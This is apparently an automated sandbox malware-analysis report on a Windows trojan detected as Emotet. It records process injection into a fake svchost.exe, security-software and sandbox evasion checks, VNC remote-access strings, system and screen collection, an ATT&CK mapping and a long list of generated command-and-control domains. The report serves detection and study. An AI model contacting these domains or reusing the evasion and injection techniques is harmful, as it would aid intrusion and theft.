Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: E11000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: E12000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: E62000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: DA0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: DA1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: DA2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: DF2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: BE0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: BE1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: BE2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: C32000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1480000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1481000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1482000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 14D2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: F10000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: F11000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: F12000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: F62000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1010000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|2_2_02C86370
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|5_2_01426370
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|6_2_01396370
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|10_2_03226370
Source: C:\Users\user\Desktop\WlCVLbzNph.exe File opened: CA HIPS KmxAgent
Source: C:\Users\user\Desktop\WlCVLbzNph.exe File opened: Agnitum Outpost firewal \pipe\acsipc_server
Source: C:\Users\user\Desktop\WlCVLbzNph.exe File opened: Webroot PREVX C:\ProgramData\PrevxCSI\csidb.csi
Source: C:\Users\user\Desktop\WlCVLbzNph.exe File opened: AVG C:\Program Files (x86)\AVG\AVG9\dfncfg.dat
Source: C:\Users\user\Desktop\WlCVLbzNph.exe Window found: AVP NULL ____AVP.Root
Source: C:\Windows\apppatch\svchost.exe File opened: CA HIPS KmxAgent
Source: C:\Windows\apppatch\svchost.exe File opened: Agnitum Outpost firewal \pipe\acsipc_server
Source: C:\Windows\apppatch\svchost.exe File opened: Webroot PREVX C:\ProgramData\PrevxCSI\csidb.csi
Source: C:\Windows\apppatch\svchost.exe File opened: AVG C:\Program Files (x86)\AVG\AVG9\dfncfg.dat
Source: C:\Windows\apppatch\svchost.exe Window found: AVP NULL ____AVP.Root
Source: WlCVLbzNph.exe, WlCVLbzNph.exe, 00000000.00000003.1437685155.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, WlCVLbzNph.exe, 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1981123376.000000000F280000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
Source: nPtwtzGyOdAtB.exe, 00000005.00000000.1809478098.0000000001860000.00000002.00000001.00040000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000006.00000000.1812790560.00000000017B0000.00000002.00000001.00040000.00000000.sdmp, nPtwtzGyOdAtB.exe, 0000000A.00000000.1820209742.00000000019C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
Source: nPtwtzGyOdAtB.exe, 00000005.00000000.1809478098.0000000001860000.00000002.00000001.00040000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000006.00000000.1812790560.00000000017B0000.00000002.00000001.00040000.00000000.sdmp, nPtwtzGyOdAtB.exe, 0000000A.00000000.1820209742.00000000019C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
Source: nPtwtzGyOdAtB.exe, 00000005.00000000.1809478098.0000000001860000.00000002.00000001.00040000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000006.00000000.1812790560.00000000017B0000.00000002.00000001.00040000.00000000.sdmp, nPtwtzGyOdAtB.exe, 0000000A.00000000.1820209742.00000000019C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
Source: WlCVLbzNph.exe, 00000000.00000003.1437685155.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, WlCVLbzNph.exe, 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, svchost.exe, 00000002.00000003.1981123376.000000000F280000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avast.comkasperskydrwebeset.comantiviraviravirustotalvirusinfoz-oleg.comtrendsecureanti-malware.comodo.comavast.comkasperskydrwebeset.comantiviraviravirustotalvirusinfoz-oleg.comtrendsecureanti-malware.comodo.comgoogle.comgoogle.comDnsapi.dllDnsQuery_ADnsQuery_UTF8DnsQuery_WQuery_Mainws2_32.dllgetaddrinfogethostbynameinet_addrqwrtpsdfghjklzxcvbnmeyuioa1676d5775e05c50b46baa5579d4fc7;%s%sMozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)/login.php6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9100016d3ad29879a90b4dd1b4f76e82166ca3\*.*...\ntdll.dllZwQuerySystemInformationGlobal\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}fuckGlobal\HighMemoryEvent_%08xc:\windowsc:\windows\explorer.exeShell_TrayWnd
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_00412FF0 cpuid 0_2_00412FF0
Source: C:\Windows\apppatch\svchost.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Source: C:\Users\user\Desktop\WlCVLbzNph.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\apppatch\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\apppatch\svchost.exe Queries volume information: C:\Users\user\AppData\Roaming\6d1da670\debug_11;Nov;2024_12;31;11.log VolumeInformation
Source: C:\Windows\apppatch\svchost.exe Queries volume information: C:\Users\user\AppData\Roaming\6d1da670\scr.bmp VolumeInformation
Source: C:\Windows\apppatch\svchost.exe Queries volume information: C:\Users\user\AppData\Roaming\6d1da670\sysinfo.log VolumeInformation
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_00402240 CreateFileA,WriteFile,WriteFile,GetSystemTimeAsFileTime,WriteFile,CloseHandle,0_2_00402240
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_00403900 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegCloseKey,GetUserNameA,CharUpperA,strstr,strstr,strstr,strstr,GetSystemWindowsDirectoryA,GetVolumeInformationA,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,0_2_00403900
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C74920 PathAddBackslashA,CreateFileA,WriteFile,WriteFile,WriteFile,WriteFile,GetModuleFileNameA,WriteFile,WriteFile,WriteFile,GetUserNameA,WriteFile,WriteFile,WriteFile,GetEnvironmentVariableA,WriteFile,WriteFile,WriteFile,GetSystemDefaultLangID,memset,WriteFile,WriteFile,WriteFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,WriteFile,WriteFile,WriteFile,GetDateFormatA,WriteFile,WriteFile,WriteFile,GetTimeFormatA,WriteFile,WriteFile,WriteFile,GetTimeZoneInformation,_snprintf,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,GetSystemWindowsDirectoryA,WriteFile,WriteFile,WriteFile,WriteFile,IsUserAnAdmin,IsUserAnAdmin,WriteFile,WriteFile,GetHandleInformation,CloseHandle,2_2_02C74920
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_004033A0 GetVersionExA,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,0_2_004033A0

Remote Access Functionality

Source: WlCVLbzNph.exeString found in binary or memory: RFB 003.006
Source: WlCVLbzNph.exe, 00000000.00000003.1437685155.00000000005C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: WlCVLbzNph.exe, 00000000.00000003.1437685155.00000000005C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: WlCVLbzNph.exe, 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: RFB 003.006
Source: WlCVLbzNph.exe, 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: $BRFB 003.006
Source: svchost.exeString found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000003.1981123376.000000000F280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000003.1981123376.000000000F280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: svchost.exe, 00000002.00000002.2692265840.0000000002CD1000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000002.2692265840.0000000002CD1000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: svchost.exe, 00000002.00000003.1455512249.0000000000881000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000003.1455512249.0000000000881000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: svchost.exe, 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: svchost.exe, 00000002.00000002.2676559004.0000000000400000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000002.2676559004.0000000000400000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: $BRFB 003.006
Source: svchost.exe, 00000002.00000002.2691342691.00000000029F3000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000002.2691342691.00000000029F3000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: svchost.exe, 00000002.00000002.2691342691.00000000029A0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000002.2691342691.00000000029A0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nPtwtzGyOdAtB.exe String found in binary or memory: RFB 003.006
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02C888F0 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,2_2_02C888F0
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02C9E6D0 setsockopt,htons,socket,setsockopt,bind,2_2_02C9E6D0
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02C9F4A0 htons,socket,setsockopt,closesocket,bind,listen,2_2_02C9F4A0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe Code function: 5_2_014288F0 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,5_2_014288F0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe Code function: 5_2_0143F4A0 htons,socket,setsockopt,closesocket,bind,listen,5_2_0143F4A0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe Code function: 5_2_0143E6D0 setsockopt,htons,socket,setsockopt,bind,5_2_0143E6D0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe Code function: 6_2_013988F0 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,6_2_013988F0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe Code function: 6_2_013AF4A0 htons,socket,setsockopt,closesocket,bind,listen,6_2_013AF4A0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe Code function: 6_2_013AE6D0 setsockopt,htons,socket,setsockopt,bind,6_2_013AE6D0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe Code function: 10_2_032288F0 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,10_2_032288F0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe Code function: 10_2_0323E6D0 setsockopt,htons,socket,setsockopt,bind,10_2_0323E6D0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe Code function: 10_2_0323F4A0 htons,socket,setsockopt,closesocket,bind,listen,10_2_0323F4A0
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | 1 Valid Accounts | 22 Native API | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | 111 Input Capture | 2 System Time Discovery | 1 Remote Desktop Protocol | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 Create Account | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | LSASS Memory | 11 Account Discovery | Remote Desktop Protocol | 1 Screen Capture | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | 1 Valid Accounts | 1 Valid Accounts | 1 Obfuscated Files or Information | Security Account Manager | 1 System Network Connections Discovery | SMB/Windows Admin Shares | 111 Input Capture | 11 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | 1 Scheduled Task/Job | 1 Access Token Manipulation | 31 Software Packing | NTDS | 2 File and Directory Discovery | Distributed Component Object Model | 2 Clipboard Data | 1 Remote Access Software | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | 1 Registry Run Keys / Startup Folder | 613 Process Injection | 1 DLL Side-Loading | LSA Secrets | 143 System Information Discovery | SSH | Keylogging | 3 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | 1 Bootkit | 1 Scheduled Task/Job | 322 Masquerading | Cached Domain Credentials | 1 Query Registry | VNC | GUI Input Capture | 14 Application Layer Protocol | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | 1 Registry Run Keys / Startup Folder | 1 Valid Accounts | DCSync | 351 Security Software Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Access Token Manipulation | Proc Filesystem | 151 Virtualization/Sandbox Evasion | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 151 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | 13 Process Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 613 Process Injection | Network Sniffing | 11 Application Window Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 1 Bootkit | Input Capture | 1 System Owner/User Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
Behavior graph (image not reproduced): Behavior Graph ID: 1553823, Sample: WlCVLbzNph.exe, Startdate: 11/11/2024, Architecture: WINDOWS, Score: 100. Process chain shown: WlCVLbzNph.exe dropped and started C:\Windows\apppatch\svchost.exe; svchost.exe injected into nPtwtzGyOdAtB.exe processes; WerFault.exe processes were started.

Source | Detection | Scanner | Label | Link
WlCVLbzNph.exe | 84% | ReversingLabs | Win32.Trojan.Emotet |
WlCVLbzNph.exe | 100% | Avira | TR/Crypt.XPACK.Gen |
WlCVLbzNph.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
                                                                                      pufyjuq.com
                                                                                      unknown
                                                                                      unknowntrue
                                                                                        unknown
                                                                                        pujytug.com
                                                                                        unknown
                                                                                        unknowntrue
                                                                                          unknown
                                                                                          galyhiw.com
                                                                                          unknown
                                                                                          unknowntrue
                                                                                            unknown
                                                                                            lykygun.com
                                                                                            unknown
                                                                                            unknowntrue
                                                                                              unknown
                                                                                              vopymyc.com
                                                                                              unknown
                                                                                              unknowntrue
                                                                                                unknown
                                                                                                gatyfaz.com
                                                                                                unknown
                                                                                                unknowntrue
                                                                                                  unknown
                                                                                                  vojycit.com
                                                                                                  unknown
                                                                                                  unknowntrue
                                                                                                    unknown
                                                                                                    lyvymej.com
                                                                                                    unknown
                                                                                                    unknowntrue
                                                                                                      unknown
                                                                                                      lygyvar.com
                                                                                                      unknown
                                                                                                      unknowntrue
                                                                                                        unknown
                                                                                                        purygiv.com
                                                                                                        unknown
                                                                                                        unknowntrue
                                                                                                          unknown
                                                                                                          gahykeb.com
                                                                                                          unknown
                                                                                                          unknowntrue
                                                                                                            unknown
                                                                                                            purymog.com
                                                                                                            unknown
                                                                                                            unknowntrue
                                                                                                              unknown
                                                                                                              gadyzib.com
                                                                                                              unknown
                                                                                                              unknowntrue
                                                                                                                unknown
                                                                                                                ganyqow.com
                                                                                                                unknown
                                                                                                                unknowntrue
                                                                                                                  unknown
                                                                                                                  lyxysun.com
                                                                                                                  unknown
                                                                                                                  unknowntrue
                                                                                                                    unknown
                                                                                                                    puzyjyg.com
                                                                                                                    unknown
                                                                                                                    unknowntrue
                                                                                                                      unknown
                                                                                                                      vopydek.com
                                                                                                                      unknown
                                                                                                                      unknowntrue
                                                                                                                        unknown
                                                                                                                        qexyfuq.com
                                                                                                                        unknown
                                                                                                                        unknowntrue
                                                                                                                          unknown
                                                                                                                          gatykyh.com
                                                                                                                          unknown
                                                                                                                          unknowntrue
                                                                                                                            unknown
                                                                                                                            vocykem.com
                                                                                                                            unknown
                                                                                                                            unknowntrue
                                                                                                                              unknown
                                                                                                                              gahynus.com
                                                                                                                              unknown
                                                                                                                              unknowntrue
                                                                                                                                unknown
                                                                                                                                pumypop.com
                                                                                                                                unknown
                                                                                                                                unknowntrue
                                                                                                                                  unknown
                                                                                                                                  lyvysur.com
                                                                                                                                  unknown
                                                                                                                                  unknowntrue
                                                                                                                                    unknown
                                                                                                                                    puzypav.com
                                                                                                                                    unknown
                                                                                                                                    unknowntrue
                                                                                                                                      unknown
                                                                                                                                      galypob.com
                                                                                                                                      unknown
                                                                                                                                      unknowntrue
                                                                                                                                        unknown
                                                                                                                                        gacyqoz.com
                                                                                                                                        unknown
                                                                                                                                        unknowntrue
                                                                                                                                          unknown
                                                                                                                                          lykywid.com
                                                                                                                                          unknown
                                                                                                                                          unknowntrue
                                                                                                                                            unknown
                                                                                                                                            lykytin.com
                                                                                                                                            unknown
                                                                                                                                            unknowntrue
                                                                                                                                              unknown
                                                                                                                                              vofyref.com
                                                                                                                                              unknown
                                                                                                                                              unknowntrue
                                                                                                                                                unknown
                                                                                                                                                qekytig.com
                                                                                                                                                unknown
                                                                                                                                                unknowntrue
                                                                                                                                                  unknown
                                                                                                                                                  vocyzek.com
                                                                                                                                                  unknown
                                                                                                                                                  unknowntrue
                                                                                                                                                    unknown
                                                                                                                                                    puvypoq.com
                                                                                                                                                    unknown
                                                                                                                                                    unknowntrue
                                                                                                                                                      unknown
                                                                                                                                                      puvybeg.com
                                                                                                                                                      unknown
                                                                                                                                                      unknowntrue
                                                                                                                                                        unknown
                                                                                                                                                        pupydig.com
                                                                                                                                                        unknown
                                                                                                                                                        unknowntrue
                                                                                                                                                          unknown
                                                                                                                                                          pupyguq.com
                                                                                                                                                          unknown
                                                                                                                                                          unknowntrue
                                                                                                                                                            unknown
                                                                                                                                                            qedyqal.com
                                                                                                                                                            unknown
                                                                                                                                                            unknowntrue
                                                                                                                                                              unknown
                                                                                                                                                              vowymom.com
                                                                                                                                                              unknown
                                                                                                                                                              unknowntrue
                                                                                                                                                                unknown
                                                                                                                                                                purypol.com
                                                                                                                                                                unknown
                                                                                                                                                                unknowntrue
                                                                                                                                                                  unknown
